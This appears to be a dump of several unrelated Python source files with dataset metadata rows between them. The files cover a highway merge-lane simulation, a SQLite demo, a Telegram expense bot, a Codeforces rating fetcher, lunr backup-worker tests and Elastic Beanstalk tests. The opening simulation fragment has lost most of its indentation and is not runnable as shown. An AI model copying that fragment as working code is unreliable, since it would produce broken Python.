SineLane(np.array([200, 12 + amplitude]), np.array([250, 12 + amplitude]), -amplitude,
2 * np.pi / (2 * 50), np.pi / 2, line_types=[c, c], forbidden=True))
net.add_lane("ex", "x2",
StraightLane(np.array([250, 17 + amplitude]), np.array([300, 17 + amplitude]), line_types=[c, c],
forbidden=True))
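        # The SineLane above traces half a sine period over its 50 m span
        # (pulsation 2*pi/(2*50) with phase pi/2), shifting the off-ramp
        # laterally by 2*amplitude = 9 m before the straight exit lane.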
road = Road(network=net, np_random=self.np_random)
# road.vehicles.append(RedLight(road, [150, 0]))
# road.vehicles.append(RedLight(road, [150, 4]))
# road.vehicles.append(RedLight(road, [150, 8]))
self.road = road
def make_vehicles(self):
"""
Populate a road with several vehicles on the highway and on the merging lane, as well as an ego-vehicle.
:return: the ego-vehicle
"""
max_l = 300
road = self.road
other_vehicles_type = utils.class_from_path(self.config["other_vehicles_type"])
car_number_each_lane = 2
# reset_position_range = (30, 40)
# reset_lane = random.choice(road.lanes)
reset_lane = ("s1", "inter1", 1)
ego_vehicle = None
birth_place = [("s1", "inter1", 0), ("s1", "inter1", 1), ("s1", "inter1", 2), ("s1", "inter1", 3)]
destinations = ["x1", "x2"]
position_deviation = 10
velocity_deviation = 2
# print("graph:", self.road.network.graph, "\n")
for l in self.road.network.LANES:
lane = road.network.get_lane(l)
cars_on_lane = car_number_each_lane
reset_position = None
if l == reset_lane:
# print("enter l==reset_lane")
cars_on_lane += 1
reset_position = random.choice(range(1, car_number_each_lane))
# reset_position = 2
for i in range(cars_on_lane):
if i == reset_position and not ego_vehicle:
ego_lane = self.road.network.get_lane(("s1", "inter1", 1))
ego_vehicle = IDMVehicle(self.road,
ego_lane.position(0, 1),
velocity=10,
heading=ego_lane.heading_at(0)).plan_route_to("x2")
# print("ego_route:", ego_vehicle.route, "\n")
# print("ego_relative_offset:",ego_vehicle.lane.local_coordinates(ego_vehicle.position)[1])
ego_vehicle.id = 0
road.vehicles.append(ego_vehicle)
self.vehicle = ego_vehicle
else:
car = other_vehicles_type.make_on_lane(road, birth_place[np.random.randint(0, 4)],
longitudinal=5 + np.random.randint(1,
10) * position_deviation,
velocity=5 + np.random.randint(1, 5) * velocity_deviation)
if self.config["other_vehicles_destination"] is not None:
destination = destinations[self.config["other_vehicles_destination"]]
else:
destination = destinations[np.random.randint(0, 2)]
# print("destination:",destination)
car.plan_route_to(destination)
car.randomize_behavior()
road.vehicles.append(car)
lane.vehicles.append(car)
# road.vehicles.append(
# other_vehicles_type(road, l.position((i + 1) * np.random.randint(*reset_position_range), 0),
# velocity=np.random.randint(18, 25), dst=3, max_length=max_l))
# for l in road.lanes[3:]:
# cars_on_lane = car_number_each_lane
# reset_position = None
# if l is reset_lane:
# cars_on_lane+=1
# reset_position = random.choice(range(1,car_number_each_lane))
# for i in range(cars_on_lane):
# if i == reset_position:
# ego_vehicle = ControlledVehicle(road, l.position((i+1) * np.random.randint(*reset_position_range), 0), velocity=20,max_length=max_l)
# road.vehicles.append(ego_vehicle)
# self.vehicle = ego_vehicle
# else:
# road.vehicles.append(other_vehicles_type(road, l.position((i+1) * np.random.randint(*reset_position_range), 0), velocity=np.random.randint(18,25),dst=2,rever=True,max_length=max_l))
for i in range(self.road.network.LANES_NUMBER):
lane = road.network.get_lane(self.road.network.LANES[i])
# print("lane:", lane.LANEINDEX, "\n")
lane.vehicles = sorted(lane.vehicles, key=lambda x: lane.local_coordinates(x.position)[0])
# print("len of lane.vehicles:", len(lane.vehicles), "\n")
for j, v in enumerate(lane.vehicles):
# print("i:",i,"\n")
v.vehicle_index_in_line = j
def fake_step(self):
"""
:return:
"""
for k in range(int(self.SIMULATION_FREQUENCY // self.POLICY_FREQUENCY)):
self.road.act()
self.road.step(1 / self.SIMULATION_FREQUENCY)
# Automatically render intermediate simulation steps if a viewer has been launched
self._automatic_rendering()
# Stop at terminal states
if self.done or self._is_terminal():
break
self.enable_auto_render = False
self.steps += 1
from highway_env.extractors import Extractor
extractor = Extractor()
extractor_features = extractor.FeatureExtractor(self.road.vehicles, 0, 1)
for i in range(2):
birth_place = [("s1", "inter1", 0), ("s1", "inter1", 1), ("s1", "inter1", 2), ("s1", "inter1", 3)]
destinations = ["x1", "x2"]
# position_deviation = 5
velocity_deviation = 1.5
other_vehicles_type = utils.class_from_path(self.config["other_vehicles_type"])
birth = birth_place[np.random.randint(0, 4)]
lane = self.road.network.get_lane(birth)
car = other_vehicles_type.make_on_lane(self.road, birth,
longitudinal=0,
velocity=5 + np.random.randint(1, 10) * velocity_deviation)
if self.config["incoming_vehicle_destination"] is not None:
destination = destinations[self.config["incoming_vehicle_destination"]]
else:
destination = destinations[np.random.randint(0, 2)]
car.plan_route_to(destination)
car.randomize_behavior()
self.road.vehicles.append(car)
lane.vehicles.append(car)
# obs = self._observation()
# reward = self._reward(action)
terminal = self._is_terminal()
info = {}
        return terminal, extractor_features
if __name__ == '__main__':
pass
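# Illustrative usage (a sketch assuming the highway_env package and its
# dependencies are installed; not executed by default):
#
#   env = MergeEnvOut()
#   env.reset()
#   terminal, features = env.fake_step()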
| 49.662651 | 203 | 0.576257 | 1,491 | 12,366 | 4.600268 | 0.165661 | 0.034699 | 0.024785 | 0.016037 | 0.417845 | 0.386499 | 0.33416 | 0.306604 | 0.250328 | 0.210964 | 0 | 0.036853 | 0.300016 | 12,366 | 248 | 204 | 49.862903 | 0.755545 | 0.208071 | 0 | 0.10828 | 0 | 0 | 0.054587 | 0.020979 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057325 | false | 0.006369 | 0.076433 | 0.006369 | 0.210191 | 0.012739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e2f40ec8188b47714aa6c85a2a8b8fcf7896b9 | 1,285 | py | Python | demo_data.py | lechemrc/DS-Unit-3-Sprint-2-SQL-and-Databases | edab19d5c73af7c6f15eb5dc3f31d2c5fce558fd | [
"MIT"
] | null | null | null | demo_data.py | lechemrc/DS-Unit-3-Sprint-2-SQL-and-Databases | edab19d5c73af7c6f15eb5dc3f31d2c5fce558fd | [
"MIT"
] | null | null | null | demo_data.py | lechemrc/DS-Unit-3-Sprint-2-SQL-and-Databases | edab19d5c73af7c6f15eb5dc3f31d2c5fce558fd | [
"MIT"
] | null | null | null | import sqlite3
sl_conn = sqlite3.connect('demo_data.sqlite3')
sl_cur = sl_conn.cursor()
# Creating table demo
table = """
CREATE TABLE demo(
s VARCHAR (10),
x INT,
y INT
);
"""
sl_cur.execute('DROP TABLE IF EXISTS demo')
sl_cur.execute(table)
# Checking for table creation accuracy
print(sl_cur.execute('PRAGMA table_info(demo);').fetchall())
demo_insert = """
INSERT INTO demo (s, x, y)
VALUES ('g', 3, 9), ('v', 5, 7), ('f', 8, 7);
"""
sl_cur.execute(demo_insert)
sl_cur.close()
sl_conn.commit()
# Testing demo file
sl_conn = sqlite3.connect('demo_data.sqlite3')
sl_cur = sl_conn.cursor()
# Number of rows
sl_cur.execute('SELECT COUNT(*) FROM demo')
result = sl_cur.fetchone()[0]
print(f'There are {result} rows.\n')
# How many rows are there where both x and y are at least 5?
sl_cur.execute("""
SELECT COUNT(*)
FROM demo
WHERE x >= 5
AND y >= 5;
""")
result = sl_cur.fetchone()[0]
print(f'There are {result} rows with values of at least 5.\n')
# How many unique values of y are there?
sl_cur.execute("""
SELECT COUNT(DISTINCT y)
FROM demo
""")
result = sl_cur.fetchone()[0]
print(f"There are {result} unique values of 'y'.")
# Closing the cursor
sl_cur.close() | 22.946429 | 63 | 0.631907 | 197 | 1,285 | 4 | 0.335025 | 0.088832 | 0.106599 | 0.068528 | 0.408629 | 0.379442 | 0.379442 | 0.310914 | 0.310914 | 0.310914 | 0 | 0.01712 | 0.227237 | 1,285 | 56 | 64 | 22.946429 | 0.776435 | 0.171984 | 0 | 0.425 | 0 | 0.025 | 0.497006 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 0.025 | 0.075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e3c1de91dc697b91606440bb81f175a4344975 | 4,679 | py | Python | code/edit.py | Seeyapm/MyDollarBot-BOTGo | f26b6ee49a2497406e2f8c783368164d6c386d28 | [
"MIT"
] | 1 | 2021-12-01T06:47:35.000Z | 2021-12-01T06:47:35.000Z | code/edit.py | Seeyapm/MyDollarBot-BOTGo | f26b6ee49a2497406e2f8c783368164d6c386d28 | [
"MIT"
] | 37 | 2021-11-04T05:41:29.000Z | 2021-11-05T03:31:44.000Z | code/edit.py | sak007/MyDollarBot | f26b6ee49a2497406e2f8c783368164d6c386d28 | [
"MIT"
] | 5 | 2021-11-18T18:23:50.000Z | 2022-01-09T16:02:50.000Z | import re
import helper
from telebot import types
def run(m, bot):
chat_id = m.chat.id
markup = types.ReplyKeyboardMarkup(one_time_keyboard=True)
markup.row_width = 2
for c in helper.getUserHistory(chat_id):
expense_data = c.split(',')
str_date = "Date=" + expense_data[0]
str_category = ",\t\tCategory=" + expense_data[1]
str_amount = ",\t\tAmount=$" + expense_data[2]
markup.add(str_date + str_category + str_amount)
info = bot.reply_to(m, "Select expense to be edited:", reply_markup=markup)
bot.register_next_step_handler(info, select_category_to_be_updated, bot)
def select_category_to_be_updated(m, bot):
info = m.text
markup = types.ReplyKeyboardMarkup(one_time_keyboard=True)
markup.row_width = 2
selected_data = [] if info is None else info.split(',')
for c in selected_data:
markup.add(c.strip())
choice = bot.reply_to(m, "What do you want to update?", reply_markup=markup)
bot.register_next_step_handler(choice, enter_updated_data, bot, selected_data)
def enter_updated_data(m, bot, selected_data):
choice1 = "" if m.text is None else m.text
markup = types.ReplyKeyboardMarkup(one_time_keyboard=True)
markup.row_width = 2
for cat in helper.getSpendCategories():
markup.add(cat)
if 'Date' in choice1:
        new_date = bot.reply_to(m, "Please enter the new date (in dd-mmm-yyyy format)")
bot.register_next_step_handler(new_date, edit_date, bot, selected_data)
if 'Category' in choice1:
new_cat = bot.reply_to(m, "Please select the new category", reply_markup=markup)
bot.register_next_step_handler(new_cat, edit_cat, bot, selected_data)
if 'Amount' in choice1:
new_cost = bot.reply_to(m, "Please type the new cost")
bot.register_next_step_handler(new_cost, edit_cost, bot, selected_data)
def edit_date(m, bot, selected_data):
user_list = helper.read_json()
new_date = "" if m.text is None else m.text
date_format = r'^(([0][1-9])|([1-2][0-9])|([3][0-1]))\-(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\-\d{4}$'
x1 = re.search(date_format, new_date)
if x1 is None:
bot.reply_to(m, "The date is incorrect")
return
chat_id = m.chat.id
data_edit = helper.getUserHistory(chat_id)
for i in range(len(data_edit)):
user_data = data_edit[i].split(',')
selected_date = selected_data[0].split('=')[1]
selected_category = selected_data[1].split('=')[1]
selected_amount = selected_data[2].split('=')[1]
if user_data[0] == selected_date and user_data[1] == selected_category and user_data[2] == selected_amount[1:]:
data_edit[i] = new_date + ',' + selected_category + ',' + selected_amount[1:]
break
user_list[str(chat_id)]['data'] = data_edit
helper.write_json(user_list)
bot.reply_to(m, "Date is updated")
def edit_cat(m, bot, selected_data):
user_list = helper.read_json()
chat_id = m.chat.id
data_edit = helper.getUserHistory(chat_id)
new_cat = "" if m.text is None else m.text
for i in range(len(data_edit)):
user_data = data_edit[i].split(',')
selected_date = selected_data[0].split('=')[1]
selected_category = selected_data[1].split('=')[1]
selected_amount = selected_data[2].split('=')[1]
if user_data[0] == selected_date and user_data[1] == selected_category and user_data[2] == selected_amount[1:]:
data_edit[i] = selected_date + ',' + new_cat + ',' + selected_amount[1:]
break
user_list[str(chat_id)]['data'] = data_edit
helper.write_json(user_list)
bot.reply_to(m, "Category is updated")
def edit_cost(m, bot, selected_data):
user_list = helper.read_json()
new_cost = "" if m.text is None else m.text
chat_id = m.chat.id
data_edit = helper.getUserHistory(chat_id)
if helper.validate_entered_amount(new_cost) != 0:
for i in range(len(data_edit)):
user_data = data_edit[i].split(',')
selected_date = selected_data[0].split('=')[1]
selected_category = selected_data[1].split('=')[1]
selected_amount = selected_data[2].split('=')[1]
if user_data[0] == selected_date and user_data[1] == selected_category and user_data[2] == selected_amount[1:]:
data_edit[i] = selected_date + ',' + selected_category + ',' + new_cost
break
user_list[str(chat_id)]['data'] = data_edit
helper.write_json(user_list)
bot.reply_to(m, "Expense amount is updated")
else:
bot.reply_to(m, "The cost is invalid")
return
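# --- Possible refactor (a sketch, not part of the original handlers) ---
# The three edit_* handlers above repeat the same find-and-replace loop; a
# helper like the one below could remove the duplication (field_index picks
# date/category/amount; all names here are illustrative):
#
# def replace_expense_field(chat_id, selected_data, field_index, new_value):
#     user_list = helper.read_json()
#     data_edit = helper.getUserHistory(chat_id)
#     selected = [s.split('=')[1] for s in selected_data]
#     for i, record in enumerate(data_edit):
#         fields = record.split(',')
#         if fields == [selected[0], selected[1], selected[2][1:]]:
#             fields[field_index] = new_value
#             data_edit[i] = ','.join(fields)
#             break
#     user_list[str(chat_id)]['data'] = data_edit
#     helper.write_json(user_list)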
| 40.686957 | 123 | 0.653131 | 699 | 4,679 | 4.11588 | 0.157368 | 0.079249 | 0.034758 | 0.038234 | 0.636774 | 0.587417 | 0.566215 | 0.566215 | 0.492527 | 0.479319 | 0 | 0.015222 | 0.213721 | 4,679 | 114 | 124 | 41.04386 | 0.766784 | 0 | 0 | 0.46875 | 0 | 0.010417 | 0.092755 | 0.020517 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.03125 | 0 | 0.114583 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e45a9537e83bc6e4c763dbf8b21bd0ddb46129 | 802 | py | Python | board/utility.py | ben741863140/cfsystem | 227e269f16533719251962f4d8caee8b51091d2f | [
"Apache-2.0"
] | 4 | 2018-02-22T01:59:07.000Z | 2020-07-09T06:28:46.000Z | board/utility.py | ben741863140/cfsystem | 227e269f16533719251962f4d8caee8b51091d2f | [
"Apache-2.0"
] | null | null | null | board/utility.py | ben741863140/cfsystem | 227e269f16533719251962f4d8caee8b51091d2f | [
"Apache-2.0"
] | null | null | null | import json
import requests
from bs4 import BeautifulSoup
def get_rating(handle):
handle = str(handle)
url = 'http://codeforces.com/api/user.info?handles=' + handle
results = BeautifulSoup(requests.get(url).text, 'html.parser').text
    results = json.loads(results)  # safer than eval and handles true/false/null
if results['status'] != 'OK':
        results['comment'] = 'handle: ' + handle + ' does not exist'
return results
info = results['result'][0]
if 'rating' not in info.keys():
info['rating'] = 0
res = {'status': 'OK', 'rating': info['rating']}
return res
def get_rating_change(handle):
print(handle)
url = 'http://codeforces.com/api/user.rating?handle=' + str(handle)
temp = requests.get(url)
results = BeautifulSoup(temp.text, 'html.parser').text
    return json.loads(results)
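# Illustrative usage (performs live Codeforces API calls; 'tourist' is only an
# example handle):
#
#   info = get_rating('tourist')
#   if info['status'] == 'OK':
#       print(info['rating'])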
| 30.846154 | 72 | 0.617207 | 97 | 802 | 5.072165 | 0.391753 | 0.02439 | 0.04878 | 0.093496 | 0.134146 | 0.134146 | 0.134146 | 0 | 0 | 0 | 0 | 0.004847 | 0.22818 | 802 | 25 | 73 | 32.08 | 0.789984 | 0 | 0 | 0 | 0 | 0 | 0.226512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.095238 | 0 | 0.333333 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e509c7d64ad4f3481c6bd6a8b0e4e0168ff090 | 11,320 | py | Python | testlunr/unit/storage/helper/utils/test_worker.py | PythonGirlSam/lunr | 9476436a46d377fab26674d41ac7444d98df1cbd | [
"Apache-2.0"
] | 6 | 2015-11-09T14:16:26.000Z | 2018-04-05T14:27:35.000Z | testlunr/unit/storage/helper/utils/test_worker.py | PythonGirlSam/lunr | 9476436a46d377fab26674d41ac7444d98df1cbd | [
"Apache-2.0"
] | 16 | 2016-01-28T20:16:47.000Z | 2019-03-07T07:30:29.000Z | testlunr/unit/storage/helper/utils/test_worker.py | SaumyaRackspace/lunr | 9476436a46d377fab26674d41ac7444d98df1cbd | [
"Apache-2.0"
] | 18 | 2015-10-23T10:10:52.000Z | 2020-12-15T07:11:52.000Z | #!/usr/bin/env python
# Copyright (c) 2011-2016 Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import multiprocessing
import os
from tempfile import mkdtemp
from shutil import rmtree
from time import sleep
import json
from lunr.common.config import LunrConfig
from lunr.common.lock import JsonLockFile
from lunr.storage.helper.utils import get_conn
from lunr.storage.helper.utils.client.memory import ClientException, reset
from lunr.storage.helper.utils.manifest import Manifest, save_manifest
from lunr.storage.helper.utils.worker import Worker, SaveProcess,\
StatsSaveProcess, RestoreProcess, StatsRestoreProcess, Block
class MockCinder(object):
def __init__(self):
self.snapshot_progress_called = 0
self.update_volume_metadata_called = 0
def snapshot_progress(self, *args, **kwargs):
self.snapshot_progress_called += 1
def update_volume_metadata(self, *args, **kwargs):
self.update_volume_metadata_called += 1
class TestStatsRestoreProcess(unittest.TestCase):
def setUp(self):
self.cinder = MockCinder()
self.scratch = mkdtemp()
self.stats_path = os.path.join(self.scratch, 'stats')
self.stat_queue = multiprocessing.Queue()
with JsonLockFile(self.stats_path) as lock:
self.stats_lock = lock
self.volume_id = 'volume_id'
self.block_count = 10
self.process = StatsRestoreProcess(
self.cinder, self.volume_id, self.stat_queue,
self.block_count, self.stats_lock, update_interval=1)
self.process.start()
def tearDown(self):
rmtree(self.scratch)
self.assertFalse(self.process.is_alive())
def test_restored(self):
blocks_restored = 3
for i in xrange(blocks_restored):
task = ('restored', 1)
self.stat_queue.put(task)
self.stat_queue.put(None)
while self.process.is_alive():
sleep(0.1)
with open(self.stats_path) as f:
stats = json.loads(f.read())
self.assertEqual(stats['block_count'], self.block_count)
self.assertEqual(stats['blocks_restored'], blocks_restored)
percent = 3 * 100.0 / 10
self.assertEqual(stats['progress'], percent)
class TestStatsSaveProcess(unittest.TestCase):
def setUp(self):
self.cinder = MockCinder()
self.scratch = mkdtemp()
self.stats_path = os.path.join(self.scratch, 'stats')
self.stat_queue = multiprocessing.Queue()
with JsonLockFile(self.stats_path) as lock:
self.stats_lock = lock
self.backup_id = 'backup_id'
self.block_count = 10
self.process = StatsSaveProcess(
self.cinder, self.backup_id, self.stat_queue,
self.block_count, self.stats_lock, update_interval=1)
self.process.start()
def tearDown(self):
rmtree(self.scratch)
self.assertFalse(self.process.is_alive())
def test_read(self):
blocks_read = 8
for i in xrange(blocks_read):
task = ('read', 1)
self.stat_queue.put(task)
self.stat_queue.put(None)
while self.process.is_alive():
sleep(0.1)
with open(self.stats_path) as f:
stats = json.loads(f.read())
self.assertEqual(stats['blocks_read'], blocks_read)
self.assertEqual(stats['block_count'], self.block_count)
self.assertEqual(stats['upload_count'], self.block_count)
self.assertEqual(stats['blocks_uploaded'], 0)
percent = (8 + 0) * 100.0 / (10 + 10)
self.assertEqual(stats['progress'], percent)
def test_uploaded(self):
blocks_uploaded = 3
for i in xrange(blocks_uploaded):
task = ('uploaded', 1)
self.stat_queue.put(task)
self.stat_queue.put(None)
while self.process.is_alive():
sleep(0.1)
with open(self.stats_path) as f:
stats = json.loads(f.read())
self.assertEqual(stats['blocks_read'], 0)
self.assertEqual(stats['block_count'], self.block_count)
self.assertEqual(stats['upload_count'], self.block_count)
self.assertEqual(stats['blocks_uploaded'], blocks_uploaded)
percent = (0 + 3) * 100.0 / (10 + 10)
self.assertEqual(stats['progress'], percent)
def test_upload_count(self):
upload_count = 7
task = ('upload_count', upload_count)
self.stat_queue.put(task)
blocks_uploaded = 3
for i in xrange(blocks_uploaded):
task = ('uploaded', 1)
self.stat_queue.put(task)
self.stat_queue.put(None)
while self.process.is_alive():
sleep(0.1)
with open(self.stats_path) as f:
stats = json.loads(f.read())
self.assertEqual(stats['blocks_read'], 0)
self.assertEqual(stats['block_count'], self.block_count)
self.assertEqual(stats['upload_count'], upload_count)
self.assertEqual(stats['blocks_uploaded'], 3)
percent = (0 + 3) * 100.0 / (10 + 7)
self.assertEqual(stats['progress'], percent)
class TestSaveProcess(unittest.TestCase):
def setUp(self):
self.block_queue = multiprocessing.JoinableQueue()
self.result_queue = multiprocessing.Queue()
self.stat_queue = multiprocessing.Queue()
self.volume_id = 'volume_id'
self.scratch = mkdtemp()
backup_path = os.path.join(self.scratch, 'backups')
self.conf = LunrConfig({
'backup': {'client': 'disk'},
'disk': {'path': backup_path},
})
self.conn = get_conn(self.conf)
self.conn.put_container(self.volume_id)
self.process = SaveProcess(self.conf, self.volume_id,
self.block_queue, self.result_queue,
self.stat_queue)
self.process.start()
def tearDown(self):
rmtree(self.scratch)
self.assertFalse(self.process.is_alive())
def test_upload(self):
dev = '/dev/zero'
salt = 'salt'
block_count = 3
for i in xrange(block_count):
block = Block(dev, i, salt)
# Lie about the hash.
block._hydrate()
hash_ = "hash_%s" % i
block._hash = hash_
self.block_queue.put(block)
self.block_queue.put(None)
while self.process.is_alive():
sleep(0.1)
stats, errors = self.result_queue.get()
self.assertEquals(stats['uploaded'], block_count)
self.assertEquals(len(errors.keys()), 0)
headers, listing = self.conn.get_container(self.volume_id)
self.assertEquals(len(listing), block_count)
class TestWorker(unittest.TestCase):
def setUp(self):
reset()
self.scratch = mkdtemp()
def tearDown(self):
rmtree(self.scratch)
def test_salt_empty_blocks(self):
vol1 = 'vol1'
vol2 = 'vol2'
manifest1 = Manifest()
manifest2 = Manifest()
conf = LunrConfig({'backup': {'client': 'memory'}})
worker1 = Worker(vol1, conf, manifest1)
worker2 = Worker(vol1, conf, manifest2)
self.assert_(worker1.manifest.salt != worker2.manifest.salt)
self.assert_(worker1.empty_block_hash != worker2.empty_block_hash)
self.assertEquals(worker1.empty_block, worker2.empty_block)
def test_delete_with_missing_blocks(self):
stats_path = os.path.join(self.scratch, 'stats')
manifest = Manifest.blank(2)
worker = Worker('foo',
LunrConfig({
'backup': {'client': 'memory'},
'storage': {'run_dir': self.scratch}
}),
manifest=manifest)
conn = worker.conn
conn.put_container('foo')
backup = manifest.create_backup('bak1')
backup[0] = worker.empty_block_hash
backup[1] = 'some_random_block_that_isnt_uploaded'
save_manifest(manifest, conn, worker.id, worker._lock_path())
obj = conn.get_object('foo', 'manifest', newest=True)
self.assertRaises(ClientException, conn.get_object,
'foo', backup[0], newest=True)
self.assertRaises(ClientException, conn.get_object,
'foo', backup[1], newest=True)
# Shouldn't blow up on 404.
worker.delete('bak1')
# Manifest should still be nicely deleted.
self.assertRaises(ClientException, conn.get_object,
'foo', 'manifest', newest=True)
def test_audit(self):
manifest = Manifest.blank(2)
worker = Worker('foo',
LunrConfig({
'backup': {'client': 'memory'},
'storage': {'run_dir': self.scratch}
}),
manifest=manifest)
conn = worker.conn
conn.put_container('foo')
backup = manifest.create_backup('bak1')
backup[0] = worker.empty_block_hash
conn.put_object('foo', backup[0], 'zeroes')
backup[1] = 'some_block_hash'
conn.put_object('foo', backup[1], ' more stuff')
save_manifest(manifest, conn, worker.id, worker._lock_path())
# Add some non referenced blocks.
conn.put_object('foo', 'stuff1', 'unreferenced stuff1')
conn.put_object('foo', 'stuff2', 'unreferenced stuff2')
conn.put_object('foo', 'stuff3', 'unreferenced stuff3')
_headers, original_list = conn.get_container('foo')
# Manifest, 2 blocks, 3 stuffs.
self.assertEquals(len(original_list), 6)
worker.audit()
_headers, new_list = conn.get_container('foo')
# Manifest, 2 blocks.
self.assertEquals(len(new_list), 3)
def test_save_stats(self):
manifest = Manifest.blank(2)
stats_path = os.path.join(self.scratch, 'statsfile')
worker = Worker('foo',
LunrConfig({
'backup': {'client': 'memory'},
'storage': {'run_dir': self.scratch}
}),
manifest=manifest,
stats_path=stats_path)
conn = worker.conn
conn.put_container('foo')
worker.save('/dev/zero', 'backup_id', timestamp=1)
try:
with open(stats_path) as f:
json.loads(f.read())
except ValueError:
self.fail("stats path does not contain valid json")
if __name__ == "__main__":
unittest.main()
| 37.359736 | 74 | 0.599205 | 1,302 | 11,320 | 5.050691 | 0.188172 | 0.027372 | 0.054745 | 0.021898 | 0.562804 | 0.50441 | 0.460158 | 0.420164 | 0.407695 | 0.387774 | 0 | 0.016131 | 0.288074 | 11,320 | 302 | 75 | 37.483444 | 0.799851 | 0.066519 | 0 | 0.487705 | 0 | 0 | 0.07235 | 0.003414 | 0 | 0 | 0 | 0 | 0.131148 | 1 | 0.081967 | false | 0 | 0.053279 | 0 | 0.155738 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e5663a61967eebf2017ef64a32596ecc3c2534 | 3,112 | py | Python | server/tests/unit/eb/test_eb.py | mdylan2/single-cell-explorer | 775e59fcf5c105bbe70edd17dbf1d2153c4f662c | [
"MIT"
] | 2 | 2021-08-30T16:32:16.000Z | 2022-03-25T22:36:23.000Z | server/tests/unit/eb/test_eb.py | mdylan2/single-cell-explorer | 775e59fcf5c105bbe70edd17dbf1d2153c4f662c | [
"MIT"
] | 194 | 2021-08-18T23:52:44.000Z | 2022-03-30T19:40:41.000Z | server/tests/unit/eb/test_eb.py | mdylan2/single-cell-explorer | 775e59fcf5c105bbe70edd17dbf1d2153c4f662c | [
"MIT"
] | 1 | 2022-01-21T09:20:15.000Z | 2022-01-21T09:20:15.000Z | import os
from unittest.mock import patch
import requests
import subprocess
import tempfile
import time
import unittest
from contextlib import contextmanager
from server.common.config.app_config import AppConfig
from server.tests import PROJECT_ROOT, FIXTURES_ROOT
@contextmanager
def run_eb_app(tempdirname):
ps = subprocess.Popen(["python", "artifact.dir/application.py"], cwd=tempdirname)
server = "http://localhost:5000"
for _ in range(10):
try:
requests.get(f"{server}/health")
break
except requests.exceptions.ConnectionError:
time.sleep(1)
try:
yield server
finally:
try:
ps.terminate()
except ProcessLookupError:
pass
class Elastic_Beanstalk_Test(unittest.TestCase):
def test_run(self):
tempdir = tempfile.TemporaryDirectory(dir=f"{PROJECT_ROOT}/server")
tempdirname = tempdir.name
config = AppConfig()
# test that eb works
config.update_server_config(multi_dataset__dataroot=f"{FIXTURES_ROOT}", app__flask_secret_key="open sesame")
config.complete_config()
config.write_config(f"{tempdirname}/config.yaml")
subprocess.check_call(f"git ls-files . | cpio -pdm {tempdirname}", cwd=f"{PROJECT_ROOT}/server/eb", shell=True)
subprocess.check_call(["make", "build"], cwd=tempdirname)
with run_eb_app(tempdirname) as server:
session = requests.Session()
response = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/config")
data_config = response.json()
assert data_config["config"]["displayNames"]["dataset"] == "pbmc3k"
def test_config(self):
check_config_script = os.path.join(PROJECT_ROOT, "server", "eb", "check_config.py")
with tempfile.TemporaryDirectory() as tempdir:
configfile = os.path.join(tempdir, "config.yaml")
app_config = AppConfig()
app_config.update_server_config(multi_dataset__dataroot=f"{FIXTURES_ROOT}")
app_config.write_config(configfile)
command = ["python", check_config_script, configfile]
# test failure mode (flask_secret_key not set)
env = os.environ.copy()
env.pop("CXG_SECRET_KEY", None)
env["PYTHONPATH"] = PROJECT_ROOT
with self.assertRaises(subprocess.CalledProcessError) as exception_context:
subprocess.check_output(command, env=env)
output = str(exception_context.exception.stdout, "utf-8")
self.assertTrue(
output.startswith(
"Error: Invalid type for attribute: app__flask_secret_key, expected type str, got NoneType"
),
f"Actual: {output}",
)
self.assertEqual(exception_context.exception.returncode, 1)
# test passing case
env["CXG_SECRET_KEY"] = "secret"
output = subprocess.check_output(command, env=env)
output = str(output, "utf-8")
self.assertTrue(output.startswith("PASS"))
